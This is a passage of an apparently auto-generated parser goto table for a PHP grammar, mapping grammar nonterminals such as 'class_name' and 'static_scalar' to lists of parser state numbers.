39,350,359,39,39,39,39,39,39,39,39,39,39,39,39,39,399,39,406,413,39,39,39,39,39,39,39,39,447,39,39,39,39,39,39,39,39,39,39,39,554,39,39,39,39,39,39,39,39,39,39,39,39,39,628,359,39,39,39,399,399,681,683,684,39,39,39,39,39,39,753,39,39,39,39,39,39,628,399,39,855,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,]),'scalar':([2,9,19,23,24,25,28,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,277,291,304,336,351,356,360,375,389,404,407,423,425,429,432,442,444,446,477,479,485,487,488,489,490,501,528,532,556,557,559,560,616,617,679,682,693,742,746,748,763,803,806,814,822,826,861,868,881,883,884,907,912,914,934,937,938,940,964,972,975,],[43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,]),'exit_or_die':([2,9,19,23,24,25,28,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,277,291,304,336,351,356,360,375,389,404,407,423,425,429,432,442,444,446,477,479,485,487,488,489,490,501,528,532,556,557,559,560,616,617,679,682,693,742,746,748,763,803,806,814,822,826,861,868,881,883,884,907,912,914,934,937,938,940,964,972,975,],[67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,]),'base_variable_with_function_calls':([2,9,19,23,24,25,28,32,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,173,179,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,265,267,268,270,277,284,291,304,336,351,356,360,375,389,404,407,423,424,425,429,432,442,444,446,477,479,485,487,488,489,490,491,499,501,528,532,533,535,537,540,545,556,557,559,560,616,617,629,679,682,693,742,746,748,751,752,763,796,803,806,814,822,826,861,868,881,883,884,907,912,914,934,937,938,940,964,972,975,],[73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,]),'class_constant':([2,9,19,23,24,25,28,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,277,291,294,304,336,351,354,356,360,375,389,404,407,423,425,429,432,442,444,446,455,456,457,468,477,479,485,487,488,489,490,501,503,528,532,556,557,559,560,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,616,617,646,679,682,693,734,735,742,746,748,763,764,771,773,803,806,814,822,826,839,851,860,861,868,881,883,884,894,907,912,914,924,928,934,937,938,940,964,972,975,],[74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,459,74,74,74,459,74,74,74,74,74,74,74,74,74,74,74,74,74,459,459,459,459,74,74,74,74,74,74,74,74,459,74,74,74,74,74,74,459,459,459,459,459,459,459,459,459,459,459,459,459,459,459,459,459,459,459,459,459,459,459,459,459,74,74,459,74,74,74,459,459,74,74,74,74,459,459,459,74,74,74,74,74,459,459,459,74,74,74,74,74,459,74,74,74,459,459,74,74,74,74,74,74,74,]),'common_scalar':([2,9,19,23,24,25,28,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,277,291,294,304,336,351,354,356,360,375,389,404,407,423,425,429,432,442,444,446,455,456,457,468,477,479,485,487,488,489,490,501,503,528,532,556,557,559,560,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,616,617,646,679,682,693,734,735,742,746,748,763,764,771,773,803,806,814,822,826,839,851,860,861,868,881,883,884,894,907,912,914,924,928,934,937,938,940,964,972,975,],[75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,458,75,75,75,458,75,75,75,75,75,75,75,75,75,75,75,75,75,458,458,458,458,75,75,75,75,75,75,75,75,458,75,75,75,75,75,75,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,75,75,458,75,75,75,458,458,75,75,75,75,458,458,458,75,75,75,75,75,458,458,458,75,75,75,75,75,458,75,75,75,458,458,75,75,75,75,75,75,75,]),'scalar_heredoc':([2,9,19,23,24,25,28,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,277,291,304,336,351,356,360,375,389,404,407,423,425,429,432,442,444,446,477,479,485,487,488,489,490,501,528,532,556,557,559,560,616,617,679,682,693,742,746,748,763,803,806,814,822,826,861,868,881,883,884,907,912,914,934,937,938,940,964,972,975,],[77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,]),'nowdoc':([2,9,19,23,24,25,28,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,277,291,294,304,336,351,354,356,360,375,389,404,407,423,425,429,432,442,444,446,455,456,457,468,477,479,485,487,488,489,490,501,503,528,532,556,557,559,560,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,616,617,646,679,682,693,734,735,742,746,748,763,764,771,773,803,806,814,822,826,839,851,860,861,868,881,883,884,894,907,912,914,924,928,934,937,938,940,964,972,975,],[78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,462,78,78,78,462,78,78,78,78,78,78,78,78,78,78,78,78,78,462,462,462,462,78,78,78,78,78,78,78,78,462,78,78,78,78,78,78,462,462,462,462,462,462,462,462,462,462,462,462,462,462,462,462,462,462,462,462,462,462,462,462,462,78,78,462,78,78,78,462,462,78,78,78,78,462,462,462,78,78,78,78,78,462,462,462,78,78,78,78,78,462,78,78,78,462,462,78,78,78,78,78,78,78,]),'class_name_constant':([2,9,19,23,24,25,28,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,277,291,294,304,336,351,354,356,360,375,389,404,407,423,425,429,432,442,444,446,455,456,457,468,477,479,485,487,488,489,490,501,503,528,532,556,557,559,560,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,616,617,646,679,682,693,734,735,742,746,748,763,764,771,773,803,806,814,822,826,839,851,860,861,868,881,883,884,894,907,912,914,924,928,934,937,938,940,964,972,975,],[79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,463,79,79,79,463,79,79,79,79,79,79,79,79,79,79,79,79,79,463,463,463,463,79,79,79,79,79,79,79,79,463,79,79,79,79,79,79,463,463,463,463,463,463,463,463,463,463,463,463,463,463,463,463,463,463,463,463,463,463,463,463,463,79,79,463,79,79,79,463,463,79,79,79,79,463,463,463,79,79,79,79,79,463,463,463,79,79,79,79,79,463,79,79,79,463,463,79,79,79,79,79,79,79,]),'base_variable':([2,9,19,23,24,25,28,32,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,173,179,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,265,267,268,270,277,284,291,304,336,351,356,360,375,389,404,407,423,424,425,429,432,442,444,446,477,479,485,487,488,489,490,491,499,501,528,532,533,535,537,540,545,556,557,559,560,616,617,629,679,682,693,742,746,748,751,752,763,796,803,806,814,822,826,861,868,881,883,884,907,912,914,934,937,938,940,964,972,975,],[84,84,84,84,84,84,84,84,212,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,]),'function_call':([2,9,19,23,24,25,28,32,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,173,179,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,265,267,268,270,277,284,291,304,336,351,356,360,375,389,404,407,423,424,425,429,432,442,444,446,477,479,485,487,488,489,490,491,499,501,528,532,533,535,537,540,545,556,557,559,560,616,617,629,679,682,693,742,746,748,751,752,763,796,803,806,814,822,826,861,868,881,883,884,907,912,914,934,937,938,940,964,972,975,],[85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,]),'class_name':([2,9,19,23,24,25,28,32,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,173,179,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,265,267,268,270,277,284,291,294,304,336,351,354,356,360,365,375,389,404,407,423,424,425,429,432,442,444,446,455,456,457,468,477,479,485,487,488,489,490,491,499,501,503,504,528,532,533,535,537,540,545,556,557,559,560,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,616,617,629,645,646,679,682,693,734,735,742,746,748,751,752,763,764,771,773,796,803,806,814,822,826,839,851,860,861,868,881,883,884,894,907,912,914,924,927,928,934,937,938,940,944,964,972,975,],[86,86,86,86,86,86,86,86,207,86,86,86,86,86,86,232,232,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,232,232,86,86,86,86,86,86,86,86,86,86,86,86,86,232,86,232,232,86,86,86,86,86,86,86,86,232,86,469,86,86,86,469,86,86,509,86,86,86,86,86,232,86,86,86,86,86,86,469,469,469,469,86,86,86,86,86,86,86,232,232,86,469,509,86,86,232,232,232,232,232,86,86,86,86,469,469,469,469,469,469,469,469,469,469,469,469,469,469,469,469,469,469,469,469,469,469,469,469,469,86,86,232,509,469,86,86,86,469,469,86,86,86,232,232,86,469,469,469,232,86,86,86,86,86,469,469,469,86,86,86,86,86,469,86,86,86,469,509,469,86,86,86,86,509,86,86,86,]),'variable_class_name':([2,9,19,23,24,25,28,32,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,173,179,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,265,267,268,270,277,284,291,294,304,336,351,354,356,360,375,389,404,407,423,424,425,429,432,442,444,446,455,456,457,468,477,479,485,487,488,489,490,491,499,501,503,528,532,533,535,537,540,545,556,557,559,560,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,616,617,629,646,679,682,693,734,735,742,746,748,751,752,763,764,771,773,796,803,806,814,822,826,839,851,860,861,868,881,883,884,894,907,912,914,924,928,934,937,938,940,964,972,975,],[87,87,87,87,87,87,87,87,215,87,87,87,87,87,87,233,233,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,233,233,87,87,87,87,87,87,87,87,87,87,87,87,87,233,87,233,233,87,87,87,87,87,87,87,87,233,87,470,87,87,87,470,87,87,87,87,87,87,87,233,87,87,87,87,87,87,470,470,470,470,87,87,87,87,87,87,87,233,233,87,470,87,87,233,233,233,233,233,87,87,87,87,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,87,87,233,470,87,87,87,470,470,87,87,87,233,233,87,470,470,470,233,87,87,87,87,87,470,470,470,87,87,87,87,87,470,87,87,87,470,470,87,87,87,87,87,87,87,]),'simple_indirect_reference':([2,9,19,23,24,25,28,32,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,105,119,120,129,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,173,179,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,256,260,261,265,267,268,270,277,284,291,304,336,351,356,360,375,389,391,394,395,404,407,410,411,423,424,425,429,432,442,444,446,477,479,485,487,488,489,490,491,499,501,528,532,533,535,537,540,545,556,557,559,560,616,617,629,679,682,693,742,746,748,751,752,763,790,796,797,803,806,814,822,826,861,868,881,883,884,907,912,914,934,937,938,940,964,972,975,],[100,100,100,100,100,100,100,100,213,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,269,100,100,100,305,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,305,305,305,100,100,100,100,100,100,100,100,100,100,100,100,100,100,305,305,305,100,100,305,305,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,305,100,305,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,]),'static_member':([2,9,19,23,24,25,28,32,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,173,179,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,265,267,268,270,277,284,291,304,336,351,356,360,375,389,404,407,423,424,425,429,432,442,444,446,477,479,485,487,488,489,490,491,499,501,528,532,533,535,537,540,545,556,557,559,560,616,617,629,679,682,693,742,746,748,751,752,763,796,803,806,814,822,826,861,868,881,883,884,907,912,914,934,937,938,940,964,972,975,],[101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,]),'variable_without_objects':([2,9,19,23,24,25,28,32,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,173,179,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,256,260,261,265,267,268,270,277,284,291,304,336,351,356,360,375,389,391,394,395,404,407,410,411,423,424,425,429,432,442,444,446,477,479,485,487,488,489,490,491,499,501,528,532,533,535,537,540,545,556,557,559,560,616,617,629,679,682,693,742,746,748,751,752,763,790,796,797,803,806,814,822,826,861,868,881,883,884,907,912,914,934,937,938,940,964,972,975,],[102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,302,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,302,428,431,102,102,102,102,102,102,102,102,102,102,102,102,102,102,527,302,531,102,102,428,431,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,302,102,302,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,]),'reference_variable':([2,9,19,23,24,25,28,32,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,105,119,120,129,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,173,179,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,256,260,261,265,267,268,270,277,284,291,294,304,336,351,354,356,360,375,389,391,394,395,404,407,410,411,423,424,425,429,432,442,444,446,455,456,457,468,477,479,485,487,488,489,490,491,499,501,503,528,532,533,535,537,540,545,556,557,559,560,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,616,617,629,646,679,682,693,734,735,742,746,748,751,752,763,764,771,773,790,796,797,803,806,814,822,826,839,851,860,861,868,881,883,884,894,907,912,914,924,928,934,937,938,940,964,972,975,],[104,104,104,104,104,104,104,104,214,104,104,104,104,104,104,234,234,104,104,104,104,104,104,104,104,104,104,104,104,104,104,271,104,104,104,271,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,234,234,104,104,104,104,104,104,104,104,104,104,104,104,104,234,104,234,234,104,104,104,271,271,271,104,104,104,104,104,234,104,472,104,104,104,472,104,104,104,104,271,271,271,104,104,271,271,104,234,104,104,104,104,104,104,472,472,472,472,104,104,104,104,104,104,104,234,234,104,472,104,104,234,234,234,234,234,104,104,104,104,472,472,472,472,472,472,472,472,472,472,472,472,472,472,472,472,472,472,472,472,472,472,472,472,472,104,104,234,472,104,104,104,472,472,104,104,104,234,234,104,472,472,472,271,234,271,104,104,104,104,104,472,472,472,104,104,104,104,104,472,104,104,104,472,472,104,104,104,104,104,104,104,]),'compound_variable':([2,9,19,23,24,25,28,32,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,105,119,120,129,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,173,179,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,256,260,261,265,267,268,270,277,284,291,294,304,336,351,354,356,360,375,389,391,394,395,404,407,410,411,423,424,425,429,432,442,444,446,455,456,457,468,477,479,485,487,488,489,490,491,499,501,503,528,532,533,535,537,540,545,556,557,559,560,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,616,617,629,646,679,682,693,734,735,742,746,748,751,752,763,764,771,773,790,796,797,803,806,814,822,826,839,851,860,861,868,881,883,884,894,907,912,914,924,928,934,937,938,940,964,972,975,],[106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,]),'inner_statement_list':([13,180,614,622,640,832,835,836,871,874,908,911,913,955,962,967,],[120,360,742,746,763,881,883,884,912,914,937,938,940,964,972,975,]),'constant_declarations':([14,],[122,]),'constant_declaration':([14,293,],[123,451,]),'use_declarations':([15,],[125,]),'use_declaration':([15,296,],[126,474,]),'global_var_list':([26,],[170,]),'global_var':([26,349,],[171,493,]),'static_var_list':([27,],[174,]),'static_var':([27,353,],[175,495,]),'echo_expr_list':([28,],[177,]),'is_reference':([34,110,784,842,],[183,274,848,889,]),'class_name_reference':([40,],[206,]),'dynamic_class_name_reference':([40,],[208,]),'array_pair_list':([45,218,],[219,401,]),'non_empty_array_pair_list':([45,218,],[221,221,]),'encaps_list':([76,98,103,186,],[257,262,266,366,]),'nowdoc_text_content':([99,],[263,]),'function_call_parameter_list':([119,265,389,425,444,479,556,557,559,560,803,806,],[280,436,526,555,567,615,696,697,699,700,858,859,]),'function_call_parameter':([119,265,389,425,444,446,479,556,557,559,560,803,806,],[281,281,281,281,281,568,281,281,281,281,281,281,281,]),'inner_statement':([120,360,742,746,763,881,883,884,912,914,937,938,940,964,972,975,],[286,286,286,286,286,286,286,286,286,286,286,286,286,286,286,286,]),'object_property':([131,256,394,790,797,],[300,418,530,854,856,]),'variable_name':([131,256,394,790,797,],[301,301,301,301,301,]),'dim_offset':([132,205,267,616,],[307,387,438,744,]),'for_expr':([161,489,748,],[339,624,821,]),'non_empty_for_expr':([161,489,748,],[341,341,341,]),'unset_variables':([179,],[357,]),'unset_variable':([179,499,],[358,635,]),'declare_list':([182,],[362,]),'extends_from':([188,],[367,]),'interface_extends_list':([189,],[370,]),'ctor_arguments':([206,],[388,]),'assignment_list':([217,533,752,],[397,678,824,]),'assignment_list_element':([217,533,535,752,],[398,398,680,398,]),'possible_comma':([221,605,],[403,733,]),'isset_variables':([244,],[412,]),'encaps_var':([257,262,266,366,],[420,420,420,420,]),'static_expr':([294,457,468,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,734,735,860,894,924,],[453,597,606,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,606,808,810,904,926,945,]),'static_scalar':([294,354,455,456,457,468,503,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,646,734,735,764,771,773,839,851,860,894,924,928,],[454,496,595,596,454,607,642,454,454,454,454,454,454,454,454,454,454,454,454,454,454,454,454,454,454,454,454,454,454,454,454,607,770,809,454,834,838,840,888,897,454,454,454,948,]),'static_heredoc':([294,354,455,456,457,468,503,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,646,734,735,764,771,773,839,851,860,894,924,928,],[461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,]),'method_or_not':([300,418,856,],[478,549,900,]),'object_dim_list':([301,],[481,]),'parameter_list':([365,504,927,944,],[505,643,947,957,]),'parameter':([365,504,645,927,944,],[506,506,769,506,506,]),'implements_list':([367,],[512,]),'fully_qualified_class_name':([369,371,513,656,661,781,831,898,925,],[515,521,521,783,787,846,880,929,929,]),'interface_list':([371,513,],[520,651,]),'trait_statement_list':([373,],[522,]),'static_array_pair_list':([468,602,],[603,731,]),'static_non_empty_array_pair_list':([468,602,],[605,605,]),'multiple_encapsed':([471,],[610,]),'while_statement':([487,],[620,]),'foreach_variable':([491,751,],[626,823,]),'switch_case_list':([492,],[630,]),'additional_catches':([500,],[636,]),'declare_statement':([501,],[638,]),'class_statement_list':([519,650,],[654,774,]),'trait_statement':([522,],[658,]),'method_modifiers':([522,654,774,],[659,778,778,]),'variable_modifiers':([522,654,774,],[660,779,779,]),'non_empty_member_modifiers':([522,654,774,],[662,662,662,]),'member_modifier':([522,654,662,774,],[665,665,788,665,]),'visibility_modifier':([522,654,662,774,950,],[666,666,666,666,961,]),'dynamic_class_name_variable_properties':([530,],[675,]),'variable_properties':([549,],[685,]),'encaps_var_offset':([550,],[688,]),'elseif_list':([613,],[740,]),'foreach_optional_arg':([626,],[749,]),'case_list':([631,632,755,758,],[754,757,828,830,]),'maybe_finally':([636,],[759,]),'lexical_vars':([644,],[766,]),'class_statement':([654,774,],[777,777,]),'class_constant_declaration':([654,774,],[780,780,]),'class_variable_declaration':([660,779,],[785,843,]),'dynamic_class_name_variable_property':([675,],[791,]),'variable_property':([685,],[798,]),'else_single':([740,],[811,]),'new_elseif_list':([742,],[815,]),'new_else_single':([815,],[863,]),'foreach_statement':([822,],[869,])